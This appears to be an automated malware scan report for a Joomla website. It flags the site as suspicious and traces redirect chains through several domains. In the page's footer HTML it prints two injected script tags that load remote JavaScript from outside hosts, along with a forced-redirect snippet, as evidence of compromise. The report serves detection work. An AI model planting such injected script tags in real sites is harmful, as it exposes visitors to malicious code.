Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nkts-nnov.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://nkts-nnov.ru/ | 200 OK Content-Length: 37183 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: expect-crown.biz ...[41341 bytes skipped]... mla! Extensions</a> library today. </p></td> </tr> <tr> <td valign="top" > </td> </tr> </table> </div> </div> </div> </div> <!-- END: BOTTOM SPOTLIGHT --> <!-- BEGIN: FOOTER --> <script type="text/javascript" charset="windows-1251" src="http://expect-crown.biz/a/91615902-nkts-nnov.ru.js"></script> <script language='javascript' type='text/javascript' src='http://irmeeting.ru/93bypxy3fo95pdk039oidw11gdv3ukph'></script> <div id="ja-footerwrap"> <div id="ja-footer" class="clearfix"> <div id="ja-footnav"> <ul id="mainlevel-nav"><li><a href="/index.php?option=com_content&view=article&id=25&Itemid=28" class="mainlevel-nav" >About Joomla!</ ...[3797 bytes skipped]... | ||
http://nkts-nnov.ru/media/system/js/caption.js | 200 OK Content-Length: 1964 Content-Type: application/javascript | clean |
http://nkts-nnov.ru/templates/ja_purity/js/ja.script.js | 200 OK Content-Length: 3208 Content-Type: application/javascript | clean |
http://nkts-nnov.ru/templates/ja_purity/js/ja.rightcol.js | 200 OK Content-Length: 1696 Content-Type: application/javascript | clean |
http://expect-crown.biz/a/91615902-nkts-nnov.ru.js | HTTP/1.1 302 Found Date: Tue, 01 Apr 2014 23:30:09 GMT Location: http://pagesinxt.com/?dn=expect-crown.biz&flrdr=yes&nxte=js Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cnection: close X-Powered-By: PHP/5.3.21 | clean |
http://pagesinxt.com/?dn=expect-crown.biz&flrdr=yes&nxte=js | HTTP/1.1 302 Found Date: Tue, 01 Apr 2014 23:30:10 GMT Location: http://mypageresults.com/?dn=expect-crown.biz&flrdr=yes&nxte=js Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 334 Content-Type: text/html; charset=iso-8859-1 X-Cnection: close | clean |
http://mypageresults.com/?dn=expect-crown.biz&flrdr=yes&nxte=js | 200 OK Content-Length: 2577 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: expect-crown.biz <!--
top.location="http://mypageresults.com/?dn=expect-crown.biz&fp=tPihWYwHKdWPSnLJo1NznnMuWkjQsLny6MnhpCwPHypnm5zOxZSwsK2Z2v%2FRw9wJWlBCbFNAAKR9TtZ0wyA%2FLw%3D%3D&prvtof=8CvqWSXlNr2xUTEdLCdXO4pLTQKn2BhRNwJ7R4oFR%2F8%3D&poru=sywnmncu9x2g8PPJYalXlmC3DYtygSN1GidAV4hyzT%2FXDMr1MPVY3jBTK%2Be5EPOQyh0qLlYWyo5EDXmMy9ngI6695hG2e9sxI695NV1pqnAcb7VyeV3aqkoNQWzabLGy&cifr=1&flrdr=yes&nxte=js"; /* --> <script type="text/javascript"> <!-- dimensionUpd ...[2433 bytes skipped]... | ||
http://mypageresults.com/?dn=expect-crown.biz&fp=tPihWYwHKdWPSnLJo1NznnMuWkjQsLny6MnhpCwPHypnm5zOxZSwsK2Z2v%2FRw9wJWlBCbFNAAKR9TtZ0wyA%2FLw%3D%3D&prvtof=f%2F3IwdSCVp2t40EeGBNcg0yP%2BOReDscTnPPcUydFrS0%3D&poru=pnxEmWnbYU2zJpH%2BHPXHvE0eC88DXhy2Qqr7VuZ0ZXu72OcedbHL3vnINqq6QNx3XUlveP88XvsdhFb%2FKrBTAzEvqsqup4%2FAe6Q5uBUxA%2BpZH3HwtG%2FZ0mjWbcQ2kQ%2BA&flrdr=yes&nxte=js | 200 OK Content-Length: 271 Content-Type: text/html | clean |
http://mypageresults.com/test404page.js | HTTP/1.1 302 Found Date: Tue, 01 Apr 2014 23:30:11 GMT Location: http://pagesinxt.com/?dn=mypageresults.com&flrdr=yes&nxte=js Server: Apache/2.2.3 (CentOS) Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cnection: close X-Powered-By: PHP/5.3.21 | clean |
http://pagesinxt.com/?dn=mypageresults.com&flrdr=yes&nxte=js | HTTP/1.1 302 Found Date: Tue, 01 Apr 2014 23:30:11 GMT Location: http://mypageresults.com/?dn=mypageresults.com&flrdr=yes&nxte=js Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 335 Content-Type: text/html; charset=iso-8859-1 X-Cnection: close | clean |
http://mypageresults.com/?dn=mypageresults.com&flrdr=yes&nxte=js | 200 OK Content-Length: 2511 Content-Type: text/html | clean |
http://mypageresults.com/?dn=mypageresults.com&fp=QsYMewbdhR22gcOkW9DKKKpKxPDTySo46AnV186rihUm6fqW6d7pMuZFeM8ikKnEyQ8PPuS5b%2BBu91tpHUr9aQ%3D%3D&prvtof=bZD998mvBo%2BbXNN3wVi%2BD%2B%2FDftHBFRE6xKkJpWwDvAc%3D&poru=UIdn0x1%2B8DAjjR1HRwuLdZEA3b2qylm1AD7Z8UUz3D4YVW2WU6T5kzrZdnB%2BugSEyWwHI74hJLD6QoFOeYplbg6Eznbravx%2F%2BMEWVh%2BjrOw%3D&flrdr=yes&nxte=js | 200 OK Content-Length: 271 Content-Type: text/html | clean |
http://irmeeting.ru/93bypxy3fo95pdk039oidw11gdv3ukph | 200 OK Content-Length: 5894 Content-Type: text/javascript | clean |
http://stats.hosting24.com/count.php | 200 OK Content-Length: 960 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nkts-nnov.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Tue, 01 Apr 2014 23:30:07 GMT
Pragma: no-cache
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.17
Content-Length: 37183
Content-Type: text/html;charset=windows-1251
Expires: Fri, 04 Apr 2014 00:00:00 GMT
Last-Modified: Tue, 01 Apr 2014 00:00:00 GMT
X-Powered-By: PHP/5.3.17
...37183 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: nkts-nnov.ru
Referer: http://www.google.com/search?q=nkts-nnov.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.